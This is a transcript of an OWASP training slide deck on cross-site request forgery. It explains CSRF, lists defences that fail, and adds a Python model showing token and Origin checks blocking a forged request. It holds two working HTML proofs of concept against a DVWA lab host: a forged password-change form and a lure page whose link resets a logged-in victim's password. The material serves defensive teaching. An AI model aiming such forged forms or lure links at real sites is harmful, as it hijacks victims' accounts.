Understanding CSRF
1. CROSS SITE REQUEST FORGERY
UNDERSTANDING
John Patrick Lita - OWASP Manila Chapter President
Venue: Philippine Army, Cyber Security Division, Taguig City
OWASP Taguig Chapter
2. DEEP UNDERSTANDING WITH CSRF VULNERABILITY
MEET THE PRESENTER
OWASP Manila Chapter President
Project Manager at Enterprise Linux Professionals
Owner of Active Security Training and Consultancy
Project leader for OWASP Online Academy
john.patrick.lita@owasp.org
3. CROSS SITE REQUEST FORGERY
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute
unwanted actions on a web application in which they're currently authenticated. CSRF
attacks specifically target state-changing requests, not theft of data, since the attacker
has no way to see the response to the forged request. With a little help of social
engineering (such as sending a link via email or chat), an attacker may trick the users
of a web application into executing actions of the attacker's choosing. If the victim is a
normal user, a successful CSRF attack can force the user to perform state changing
requests like transferring funds, changing their email address, and so forth. If the
victim is an administrative account, CSRF can compromise the entire web application.
4–9. CSRF ILLUSTRATION
(Figure residue, slides 4–9: a six-step animation. Two forms are shown side by side, "Regular Form" and "CSRF Form Template", each with a "COMMENT HERE:" field and a POST button. "I AM AWESOME!" is posted and appears on the board as "Jaypee: I AM AWESOME!"; "I AM NOOB!" is then posted and likewise appears as "Jaypee: I AM NOOB!".)
15. PREVENTION MEASURES THAT DO NOT WORK
CSRF TEMPLATE WEB INTERFACE
Copy the code of the CSRF Template and save it as an HTML file, then open the file in any
browser you like. Click Submit and analyse the behaviour.
After that, try to log in. The source code is on the next page (Page 16).
16. CSRF TEMPLATE SOURCE CODE
<!DOCTYPE html>
<html>
  <head>
    <title>CSRF Template</title>
  </head>
  <body>
    <br>
    <!-- Forged password-change request aimed at the DVWA lab host. The victim's
         browser attaches its DVWA session cookie to this request automatically,
         which is the behaviour the exercise asks you to observe. -->
    <form action="http://172.16.157.129/dvwa/vulnerabilities/csrf/?" method="GET">
      New Password:<br>
      <input type="password" autocomplete="off" name="password_new" value="12345"><br>
      Confirm New Password:<br>
      <input type="password" autocomplete="off" name="password_conf" value="12345"><br>
      <input type="submit" value="Change" name="Change">
    </form>
  </body>
</html>
17. PREVENTION MEASURES THAT DO NOT WORK
▸ Using a secret cookie
▸ Remember that all cookies, even the secret ones, will be submitted with every request. All
authentication tokens will be submitted regardless of whether or not the end-user was tricked
into submitting the request. Furthermore, session identifiers are simply used by the application
container to associate the request with a specific session object. The session identifier does not
verify that the end-user intended to submit the request.
18. PREVENTION MEASURES THAT DO NOT WORK
▸ Only Accept POST requests
▸ Applications can be developed to only accept POST requests for the execution of business logic. The
misconception is that since the attacker cannot construct a malicious link, a CSRF attack cannot be
executed. Unfortunately, this logic is incorrect. There are numerous methods in which an attacker can
trick a victim into submitting a forged POST request, such as a simple form hosted in an attacker's
Website with hidden values. This form can be triggered automatically by JavaScript or can be
triggered by the victim who thinks the form will do something else.
19. PREVENTION MEASURES THAT DO NOT WORK
▸ Multi-Step Transaction
Multi-Step transactions are not an adequate prevention of CSRF. As
long as an attacker can predict or deduce each step of the completed
transaction, then CSRF is possible.
▸ URL Rewriting
This might be seen as a useful CSRF prevention technique as the
attacker cannot guess the victim's session ID. However, the user’s
session ID is exposed in the URL. We don't recommend fixing one
security flaw by introducing another.
▸ HTTPS
HTTPS does nothing to defend against CSRF.
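The three slides above say that a secret cookie, accepting only POST, and HTTPS do not stop CSRF. The following model makes that concrete and shows what does. It is an added example, not code from the slides or from DVWA: a password-change endpoint is written as a pure function over a simplified request, once with only the cookie/POST/HTTPS checks and once with a synchronizer token plus an Origin check. The cookie name PHPSESSID, the form field user_token and the attacker origin are assumptions for the illustration; the host is the lab address used in the slides.

```python
"""Why cookie-only, POST-only and HTTPS checks do not stop CSRF, and what does.

Added example (not from the slides). The browser attaches the session cookie
to every request to the site, including ones a third-party page forged, so any
check that relies on the cookie alone passes for the forged request. A
synchronizer token (a per-session secret echoed back in the form body) and an
Origin check both distinguish the two requests, because the attacker's page
can neither read the token nor choose the Origin header the browser sends.
"""
import hmac
import secrets
from dataclasses import dataclass, field

SITE_ORIGIN = "http://172.16.157.129"  # the DVWA lab host from the slides

# Server-side session store: session id -> {"user": ..., "csrf_token": ...}
SESSIONS = {}


def new_session(user):
    """Create a logged-in session with a fresh, unguessable CSRF token."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user": user, "csrf_token": secrets.token_hex(32)}
    return sid


@dataclass
class Request:
    method: str
    cookies: dict          # cookie name -> value (sent by the browser automatically)
    params: dict           # query string or form body, flattened
    headers: dict = field(default_factory=dict)
    https: bool = True


def change_password_cookie_only(req):
    """The 'secret cookie', 'POST only' and 'HTTPS' defences, all at once."""
    if req.method != "POST":
        return "rejected: not POST"
    if not req.https:
        return "rejected: not HTTPS"
    sess = SESSIONS.get(req.cookies.get("PHPSESSID"))  # assumed cookie name
    if sess is None:
        return "rejected: no session"
    if req.params.get("password_new") != req.params.get("password_conf"):
        return "rejected: passwords differ"
    return f"changed password for {sess['user']}"


def change_password_with_token(req):
    """Same endpoint with a synchronizer token and a strict Origin check."""
    sess = SESSIONS.get(req.cookies.get("PHPSESSID"))
    if req.method != "POST" or sess is None:
        return "rejected: no session or not POST"
    # Browsers always send Origin on POST; anything other than our own origin
    # (including a missing header) is treated as cross-site.
    if req.headers.get("Origin") != SITE_ORIGIN:
        return "rejected: cross-origin request"
    token = req.params.get("user_token", "")  # assumed field name
    if not hmac.compare_digest(token, sess["csrf_token"]):
        return "rejected: bad CSRF token"
    if req.params.get("password_new") != req.params.get("password_conf"):
        return "rejected: passwords differ"
    return f"changed password for {sess['user']}"


def simulate():
    """Run a genuine and a forged submission through both versions."""
    sid = new_session("admin")
    cookies = {"PHPSESSID": sid}
    # Legitimate submission from the site's own form, token included.
    genuine = Request("POST", cookies,
                      {"password_new": "s3cret", "password_conf": "s3cret",
                       "user_token": SESSIONS[sid]["csrf_token"]},
                      headers={"Origin": SITE_ORIGIN})
    # Forged submission: a hidden form on a third-party page, auto-submitted by
    # the victim's browser over HTTPS as a POST. The cookie still goes along;
    # the token is unknown and the browser reports the third-party Origin.
    forged = Request("POST", cookies,
                     {"password_new": "password", "password_conf": "password"},
                     headers={"Origin": "http://attacker.example"})  # constructed
    return {
        "cookie_only_genuine": change_password_cookie_only(genuine),
        "cookie_only_forged": change_password_cookie_only(forged),
        "token_genuine": change_password_with_token(genuine),
        "token_forged": change_password_with_token(forged),
    }


if __name__ == "__main__":
    for name, outcome in simulate().items():
        print(f"{name:22} {outcome}")
```

Running it shows the cookie-only version accepting the forged POST exactly as it accepts the genuine one, while the token version rejects it; the multi-step and URL-rewriting cases on the slide fail for the same reason as the cookie, because every value the attacker needs is either predictable or sent by the browser.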
21. CSRF ATTACK USING SOCIAL ENGINEERING
One technique, or attack vector, is a click-jacking attack. To test it, proceed to the next page for
the source code, then execute it by clicking “Click Here!”.
22. CSRF ATTACK USING SOCIAL ENGINEERING
<!DOCTYPE html>
<html>
  <head>
    <title>Please Check your Account Here!</title>
  </head>
  <body>
    <h1>Check your account Here!</h1>
    <!-- The link carries the password-change parameters in its query string;
         a victim who is logged in to the DVWA lab sends them together with the
         session cookie when the link is clicked. -->
    <a href="http://172.16.157.129/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#">Click Here!</a>
  </body>
</html>